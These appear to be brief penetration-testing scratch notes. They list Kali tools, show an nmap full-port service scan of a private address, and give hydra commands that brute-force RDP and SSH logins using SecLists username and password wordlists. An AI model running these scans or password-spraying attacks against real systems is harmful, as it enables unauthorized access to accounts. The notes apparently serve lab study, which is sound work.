metasploit
kali
netdiscover -help
nmap -p- 192.168.1.21 -sV
As we can see above, there are a lot of open ports and services available on the target machine. In the command above, I used the -sV switch for enumerating the version information of the identified services. This will help us identify vulnerable services to exploit.
RDP bruteForce
https://medium.com/swlh/using-hydra-to-spray-user-passwords-dcc12f016ba9
hydra -L user.txt -P pass.txt 10.10.102.10 rdp -u
hydra -L users.txt -P passwords.txt 192.168.0.1 ssh -u
https://github.com/danielmiessler/SecLists/tree/master/Usernames
https://github.com/danielmiessler/SecLists/tree/master/Passwords/Common-Credentials